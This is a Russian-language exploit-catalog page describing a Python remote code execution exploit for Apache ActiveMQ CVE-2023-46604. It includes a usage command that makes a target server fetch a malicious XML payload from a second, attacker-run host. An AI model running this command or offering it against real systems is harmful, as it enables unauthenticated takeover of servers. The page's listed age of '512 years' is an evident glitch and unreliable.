Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/justdoit-cai/cve-2023-46604-apache-activemq-rce-exp
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийИнструмент Удаленного Доступа
GitHubjustdoit-cai/cve-2023-46604-apache-activemq-rce-exp

CVE-2023-46604-Apache-ActiveMQ-RCE-exp

Python-эксплойт удаленного выполнения кода для Apache ActiveMQ CVE-2023-46604, использующий протокол OpenWire для доставки XML-полезных нагрузок для неаутентифицированного RCE.

Репозиторий
512 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Ссылка на проект

Данный проект — это exp на python, переписанный на основе exp из проекта https://github.com/X1r0z/ActiveMQ-RCE.

Использование

root@kitploit:~
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616

Параметр -p по умолчанию равен стандартному порту activeMQ. Обратите внимание, что к параметру -x необходимо добавить префикс протокола.

Введение

Здесь приведена схема протокола openwire, и всё сразу становится понятно. Ниже показан формат пакета данных типа .

Throwable

Конкретный анализ уязвимости см. в справочных статьях ниже.

Справочные статьи

root@kitploit:~
# openwire协议的分析
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# CVE漏洞原理的分析
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
Скачать инструмент